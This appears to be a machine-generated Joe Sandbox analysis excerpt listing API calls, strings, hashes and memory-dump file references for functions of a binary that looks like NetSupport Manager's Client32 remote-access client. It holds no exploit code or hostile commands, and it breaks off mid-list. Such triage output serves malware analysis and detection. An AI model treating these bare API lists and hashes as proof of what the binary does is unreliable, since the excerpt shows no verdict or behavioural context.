                                                                                                      • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                                      • Opcode Fuzzy Hash: 13b000d7faa6fd9acbdfe3c5b590adeb65eceb06c65d3f1f2622c8f441c886b5
                                                                                                      • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
                                                                                                      APIs
                                                                                                        • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                                        • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                                        • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                                        • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                                        • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                      • API String ID: 3136964118-2830328467
                                                                                                      • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                                      • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
                                                                                                      • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                                      • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 111370A6
                                                                                                      • _free.LIBCMT ref: 111370DD
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • _free.LIBCMT ref: 1113716D
                                                                                                        • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                                      • _free.LIBCMT ref: 1113713E
                                                                                                        • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                        • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                                      • String ID: *HelpReqServer$Client
                                                                                                      • API String ID: 1390041139-3616015116
                                                                                                      • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                                      • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                                      • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                                      • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                                      APIs
                                                                                                      • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                                        • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                                      • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                                      • MessageBeep.USER32(00000000), ref: 11143427
                                                                                                      • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                                      • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                                      • String ID: 1000,50
                                                                                                      • API String ID: 3904670044-1941404556
                                                                                                      • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                                      • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                                      • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                                      • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32(75BF7AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                                      • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                                        • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                                      • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                                      • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                                      • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                                      • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3235510773-0
                                                                                                      • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                                      • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                                      • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                                      • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
                                                                                                      APIs
                                                                                                      • _memset.LIBCMT ref: 1101D0FE
                                                                                                      • LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
                                                                                                      • RegisterClassExA.USER32(00000030), ref: 1101D181
                                                                                                      • GetLastError.KERNEL32 ref: 1101D187
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 430917334-4108050209
                                                                                                      • Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                                      • Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
                                                                                                      • Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                                      • Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
                                                                                                      APIs
                                                                                                      • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                                      • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                      • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                      • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                      • API String ID: 468487828-934300333
                                                                                                      • Opcode ID: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                                      • Instruction ID: e80103f9713123d07a9bceb05cb6f887813353322251b2c4d1aa2998eabbc516
                                                                                                      • Opcode Fuzzy Hash: e42f28694fc46f4086300125048bfedf8bbbd82d4e050df1718e76ccc8693524
                                                                                                      • Instruction Fuzzy Hash: E5F0A73EF9466933D31666F53D1AF4BAB485B815ACB060031F524EA740EE14B4018166
                                                                                                      APIs
                                                                                                      • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                                      • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                                      • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 180989782-0
                                                                                                      • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                                      • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                                      • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                                      • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                                      APIs
                                                                                                      • SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                                      • CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$EventObjectSingleWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 2857295742-0
                                                                                                      • Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                                      • Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
                                                                                                      • Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
                                                                                                      • Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
                                                                                                      APIs
                                                                                                      • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
                                                                                                        • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
                                                                                                      • EqualRect.USER32(?,?), ref: 1107713C
                                                                                                      • SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
                                                                                                      Strings
                                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
                                                                                                      • m_hWnd, xrefs: 11077177
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Window$DeferEqualPointsRect
                                                                                                      • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                      • API String ID: 2754115966-2830328467
                                                                                                      • Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                                      • Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
                                                                                                      • Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
                                                                                                      • Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                                      • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
